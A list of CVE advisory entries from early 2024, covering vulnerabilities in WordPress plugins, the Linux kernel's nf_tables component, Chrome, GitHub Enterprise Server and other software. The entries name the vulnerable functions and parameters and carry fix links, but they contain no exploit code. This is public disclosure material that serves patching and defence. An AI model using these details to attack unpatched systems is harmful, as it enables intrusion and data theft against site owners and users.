CVE 2024 1090 Candidate The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the stopOptimizeAll function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify image optimization settings. MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f3fae909-5564-4e0a-9114-edd0e45865e5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f3fae909-5564-4e0a-9114-edd0e45865e5?source=cve Assigned (20240130)
CVE 2024 1089 Candidate The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the optimizeAllOn function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify image optimization settings. MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ff16906-2516-4b3c-8217-e3fb24924e27?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ff16906-2516-4b3c-8217-e3fb24924e27?source=cve Assigned (20240130)
CVE 2024 1088 Candidate The Password Protected Store for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9 via the REST API. This makes it possible for unauthenticated attackers to extract sensitive data including post titles and content. MISC:https://wordpress.org/plugins/password-protected-woo-store/ | URL:https://wordpress.org/plugins/password-protected-woo-store/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7ae1e8fd-4d1b-4590-a141-f93d6347c0f2?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7ae1e8fd-4d1b-4590-a141-f93d6347c0f2?source=cve Assigned (20240130)
CVE 2024 1087 Candidate ** REJECT ** This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is a duplicate of CVE-2024-1085. Assigned (20240130)
CVE 2024 1086 Candidate A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT. We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660. FEDORA:FEDORA-2024-2116a8468b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/ | MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660 | URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660 | MISC:https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660 | URL:https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660 Assigned (20240130)
CVE 2024 1085 Candidate A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The nft_setelem_catchall_deactivate() function checks whether the catch-all set element is active in the current generation instead of the next generation before freeing it, but only flags it inactive in the next generation, making it possible to free the element multiple times, leading to a double free vulnerability. We recommend upgrading past commit b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7. MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7 | URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7 | MISC:https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7 | URL:https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7 Assigned (20240130)
CVE 2024 1084 Candidate Cross-site Scripting in the tag name pattern field in the tag protections UI in GitHub Enterprise Server allows a malicious website that requires user interaction and social engineering to make changes to a user account via CSP bypass with created CSRF tokens. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in all versions of 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program. MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 Assigned (20240130)
CVE 2024 1083 Candidate The Simple Restrict plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.6 via the REST API. This makes it possible for authenticated attackers to bypass the plugin's restrictions to extract post titles and content MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035727%40simple-restrict&new=3035727%40simple-restrict&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035727%40simple-restrict&new=3035727%40simple-restrict&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/65963ce0-6589-4753-837c-14ef37a1a9e3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/65963ce0-6589-4753-837c-14ef37a1a9e3?source=cve Assigned (20240130)
CVE 2024 1082 Candidate A path traversal vulnerability was identified in GitHub Enterprise Server that allowed an attacker to gain unauthorized read permission to files by deploying arbitrary symbolic links to a GitHub Pages site with a specially crafted artifact tarball. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.15, 3.9.10, 3.10.7, 3.11.5. This vulnerability was reported via the GitHub Bug Bounty program. MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 Assigned (20240130)
CVE 2024 1081 Candidate The 3D FlipBook – PDF Flipbook WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bookmark feature in all versions up to, and including, 1.15.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038174%40interactive-3d-flipbook-powered-physics-engine&new=3038174%40interactive-3d-flipbook-powered-physics-engine&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038174%40interactive-3d-flipbook-powered-physics-engine&new=3038174%40interactive-3d-flipbook-powered-physics-engine&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/807eadff-b39e-4d7a-9b0a-06fc18a90626?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/807eadff-b39e-4d7a-9b0a-06fc18a90626?source=cve Assigned (20240130)
CVE 2024 1080 Candidate The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the via the heading tag in all versions up to, and including, 2.7.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/heading/includes/frontend.php#L1 | URL:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/heading/includes/frontend.php#L1 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d62d3ca5-5795-46ef-ad8c-4474ff1e504e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d62d3ca5-5795-46ef-ad8c-4474ff1e504e?source=cve Assigned (20240130)
CVE 2024 1079 Candidate The Quiz Maker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_show_results() function in all versions up to, and including, 6.5.2.4. This makes it possible for unauthenticated attackers to fetch arbitrary quiz results which can contain PII. MISC:https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php | URL:https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/602df370-cd5b-46dc-a653-6522aef0c62f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/602df370-cd5b-46dc-a653-6522aef0c62f?source=cve Assigned (20240130)
CVE 2024 1078 Candidate The Quiz Maker plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ays_quick_start() and add_question_rows() functions in all versions up to, and including, 6.5.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary quizzes. MISC:https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php | URL:https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7ba2b270-5f02-4cd8-8a22-1723c3873d67?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7ba2b270-5f02-4cd8-8a22-1723c3873d67?source=cve Assigned (20240130)
CVE 2024 1077 Candidate Use after free in Network in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High) FEDORA:FEDORA-2024-87e0baecb6 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/ | FEDORA:FEDORA-2024-ca36dcc1d3 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html | MISC:https://crbug.com/1511085 | URL:https://crbug.com/1511085 Assigned (20240130)
CVE 2024 1075 Candidate The Minimal Coming Soon – Coming Soon Page plugin for WordPress is vulnerable to maintenance mode bypass and information disclosure in all versions up to, and including, 2.37. This is due to the plugin improperly validating the request path. This makes it possible for unauthenticated attackers to bypass maintenance mode and view pages that should be hidden. MISC:https://plugins.trac.wordpress.org/browser/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php#L67 | URL:https://plugins.trac.wordpress.org/browser/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php#L67 | MISC:https://plugins.trac.wordpress.org/changeset/3031149/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php | URL:https://plugins.trac.wordpress.org/changeset/3031149/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/78203b98-15bc-4d8e-9278-c472b518be07?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/78203b98-15bc-4d8e-9278-c472b518be07?source=cve Assigned (20240130)
CVE 2024 1074 Candidate The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the audio widget 'link_url' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/audio/includes/frontend.php#L34 | URL:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/audio/includes/frontend.php#L34 | MISC:https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/modules/audio/includes/frontend.php?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/modules/audio/includes/frontend.php | URL:https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/modules/audio/includes/frontend.php?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/modules/audio/includes/frontend.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a49e4f5a-ac9d-4f9b-8de2-c7871da8de35?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a49e4f5a-ac9d-4f9b-8de2-c7871da8de35?source=cve Assigned (20240130)
CVE 2024 1073 Candidate The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'filter_array' parameter in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/wp-slimstat/trunk/admin/index.php#L1004 | URL:https://plugins.trac.wordpress.org/browser/wp-slimstat/trunk/admin/index.php#L1004 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029858%40wp-slimstat&new=3029858%40wp-slimstat&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029858%40wp-slimstat&new=3029858%40wp-slimstat&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/33cba63c-4629-48fd-850f-f68dad626a67?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/33cba63c-4629-48fd-850f-f68dad626a67?source=cve Assigned (20240130)
CVE 2024 1072 Candidate The Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the seedprod_lite_new_lpage function in all versions up to, and including, 6.15.21. This makes it possible for unauthenticated attackers to change the contents of coming-soon, maintenance pages, login and 404 pages set up with the plugin. Version 6.15.22 addresses this issue but introduces a bug affecting admin pages. We suggest upgrading to 6.15.23. MISC:https://plugins.trac.wordpress.org/changeset/3029567/coming-soon/trunk/app/lpage.php | URL:https://plugins.trac.wordpress.org/changeset/3029567/coming-soon/trunk/app/lpage.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/78d7920b-3e20-43c7-a522-72bac824c2cb?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/78d7920b-3e20-43c7-a522-72bac824c2cb?source=cve Assigned (20240130)
CVE 2024 1071 Candidate The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076 | URL:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076 | MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L666 | URL:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L666 | MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L858 | URL:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L858 | MISC:https://plugins.trac.wordpress.org/changeset/3038036/ultimate-member/trunk/includes/core/class-member-directory-meta.php | URL:https://plugins.trac.wordpress.org/changeset/3038036/ultimate-member/trunk/includes/core/class-member-directory-meta.php | MISC:https://wordpress.org/plugins/ultimate-member/ | URL:https://wordpress.org/plugins/ultimate-member/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/005fa621-3c49-4c23-add5-d6b7a9110055?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/005fa621-3c49-4c23-add5-d6b7a9110055?source=cve Assigned (20240130)
CVE 2024 1070 Candidate The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the features attribute in all versions up to, and including, 1.58.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/widgets/features/tpl/default.php#L26 | URL:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/widgets/features/tpl/default.php#L26 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a8b6dafb-7b2f-4459-95bd-eb7e147a4466?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a8b6dafb-7b2f-4459-95bd-eb7e147a4466?source=cve Assigned (20240130)
CVE 2024 1069 Candidate The Contact Form Entries plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'view_page' function in versions up to, and including, 1.3.2. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible. MISC:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/includes/plugin-pages.php?rev=3003884#L1213 | URL:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/includes/plugin-pages.php?rev=3003884#L1213 | MISC:https://plugins.trac.wordpress.org/changeset/3028640/contact-form-entries#file1 | URL:https://plugins.trac.wordpress.org/changeset/3028640/contact-form-entries#file1 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/120313be-9f98-4448-9f5d-a77186a6ff08?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/120313be-9f98-4448-9f5d-a77186a6ff08?source=cve Assigned (20240130)
CVE 2024 1068 Candidate The 404 Solution WordPress plugin before 2.35.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admins. MISC:https://wpscan.com/vulnerability/25e3c1a1-3c45-41df-ae50-0e20d86c5484/ | URL:https://wpscan.com/vulnerability/25e3c1a1-3c45-41df-ae50-0e20d86c5484/ Assigned (20240130)
CVE 2024 1066 Candidate An issue has been discovered in GitLab EE affecting all versions from 13.3.0 prior to 16.6.7, 16.7 prior to 16.7.5, and 16.8 prior to 16.8.2 which allows an attacker to do a resource exhaustion using GraphQL `vulnerabilitiesCountByDay` MISC:GitLab Issue #420341 | URL:https://gitlab.com/gitlab-org/gitlab/-/issues/420341 Assigned (20240130)
CVE 2024 1064 Candidate A host header injection vulnerability in the HTTP handler component of Crafty Controller allows a remote, unauthenticated attacker to trigger a Denial of Service (DoS) condition via a modified host header MISC:GitLab Issue #327 | URL:https://gitlab.com/crafty-controller/crafty-4/-/issues/327 Assigned (20240130)
CVE 2024 1063 Candidate Appwrite <= v1.4.13 is affected by a Server-Side Request Forgery (SSRF) via the '/v1/avatars/favicon' endpoint due to an incomplete fix of CVE-2023-27159. MISC:https://www.tenable.com/security/research/tra-2024-03 | URL:https://www.tenable.com/security/research/tra-2024-03 Assigned (20240130)
CVE 2024 1062 Candidate A heap overflow flaw was found in 389-ds-base. This issue leads to a denial of service when writing a value larger than 256 chars in log_entry_attr. MISC:RHBZ#2261879 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2261879 | MISC:RHSA-2024:1074 | URL:https://access.redhat.com/errata/RHSA-2024:1074 | MISC:RHSA-2024:1372 | URL:https://access.redhat.com/errata/RHSA-2024:1372 | MISC:https://access.redhat.com/security/cve/CVE-2024-1062 | URL:https://access.redhat.com/security/cve/CVE-2024-1062 | MISC:https://bugzilla.redhat.com/show_bug.cgi?id=2256711 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256711 Assigned (20240130)
CVE 2024 1061 Candidate The 'HTML5 Video Player' WordPress Plugin, version < 2.5.25 is affected by an unauthenticated SQL injection vulnerability in the 'id' parameter in the 'get_view' function. MISC:https://www.tenable.com/security/research/tra-2024-02 | URL:https://www.tenable.com/security/research/tra-2024-02 Assigned (20240130)
CVE 2024 1060 Candidate Use after free in Canvas in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-87e0baecb6 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/ | FEDORA:FEDORA-2024-ca36dcc1d3 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html | MISC:https://crbug.com/1511567 | URL:https://crbug.com/1511567 Assigned (20240130)
CVE 2024 1059 Candidate Use after free in Peer Connection in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-87e0baecb6 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/ | FEDORA:FEDORA-2024-ca36dcc1d3 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html | MISC:https://crbug.com/1514777 | URL:https://crbug.com/1514777 Assigned (20240130)
CVE 2024 1058 Candidate The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the onclick parameter in all versions up to, and including, 1.58.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 1.58.3 offers a partial fix. MISC:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.2/widgets/button/tpl/default.php#L22 | URL:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.2/widgets/button/tpl/default.php#L22 | MISC:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.3/base/base.php#L404 | URL:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.3/base/base.php#L404 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033967%40so-widgets-bundle%2Ftrunk&old=3031864%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033967%40so-widgets-bundle%2Ftrunk&old=3031864%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ffeb766f-3684-4eec-bacb-bbf0d434aba0?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ffeb766f-3684-4eec-bacb-bbf0d434aba0?source=cve Assigned (20240129)
CVE 2024 1055 Candidate The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's buttons in all versions up to, and including, 2.7.14 due to insufficient input sanitization and output escaping on user supplied URL values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/powerpack-lite-for-elementor/trunk/modules/buttons/widgets/buttons.php#L1544 | URL:https://plugins.trac.wordpress.org/browser/powerpack-lite-for-elementor/trunk/modules/buttons/widgets/buttons.php#L1544 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030473%40powerpack-lite-for-elementor&new=3030473%40powerpack-lite-for-elementor&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030473%40powerpack-lite-for-elementor&new=3030473%40powerpack-lite-for-elementor&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/036cf299-80c2-48a8-befc-02899ab96e3c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/036cf299-80c2-48a8-befc-02899ab96e3c?source=cve Assigned (20240129)
CVE 2024 1054 Candidate The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wcj_product_barcode' shortcode in all versions up to, and including, 7.1.6 due to insufficient input sanitization and output escaping on user supplied attributes like 'color'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034358%40woocommerce-jetpack&new=3034358%40woocommerce-jetpack&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034358%40woocommerce-jetpack&new=3034358%40woocommerce-jetpack&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c0b86c45-c346-4df7-844e-01de027bbc1e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c0b86c45-c346-4df7-844e-01de027bbc1e?source=cve Assigned (20240129)
CVE 2024 1053 Candidate The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'email' action in all versions up to, and including, 5.8.1. This makes it possible for authenticated attackers, with contributor-level access and above, to email the attendees list to themselves. MISC:https://plugins.trac.wordpress.org/changeset/3038150/event-tickets/tags/5.8.2/src/Tickets/Commerce/Reports/Attendees.php | URL:https://plugins.trac.wordpress.org/changeset/3038150/event-tickets/tags/5.8.2/src/Tickets/Commerce/Reports/Attendees.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7839847-2637-4a0d-bfc1-5f80b8433e24?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7839847-2637-4a0d-bfc1-5f80b8433e24?source=cve Assigned (20240129)
CVE 2024 1052 Candidate Boundary and Boundary Enterprise (“Boundary”) is vulnerable to session hijacking through TLS certificate tampering. An attacker with privileges to enumerate active or pending sessions, obtain a private key pertaining to a session, and obtain a valid trust on first use (TOFU) token may craft a TLS certificate to hijack an active session and gain access to the underlying service or application. MISC:https://discuss.hashicorp.com/t/hcsec-2024-02-boundary-vulnerable-to-session-hijacking-through-tls-certificate-tampering/62458 | URL:https://discuss.hashicorp.com/t/hcsec-2024-02-boundary-vulnerable-to-session-hijacking-through-tls-certificate-tampering/62458 Assigned (20240129)
